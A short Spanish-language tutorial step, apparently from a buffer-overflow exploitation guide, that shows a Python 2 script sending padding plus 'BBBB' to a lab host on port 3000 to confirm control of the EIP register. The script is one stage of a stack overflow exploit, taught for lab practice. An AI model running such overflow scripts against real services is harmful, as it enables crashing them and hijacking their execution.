Overwriting The EIP
Este paso es para validar que el EIP tenga el valor indicado posteriormente:
#!/usr/bin/python2.7
import sys, socket
shellcode = "A" * VALOR_DEL_OFFSET + "B" * 4 #(valor del paso anterior)
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.10.111',3000))
s.send(('FUNCION /.:/' + shellcode))
s.close()
except:
print "Error connecting to server"
sys.exit()
Resultado en EIP debe ser 42424242
Última actualización
¿Te fue útil?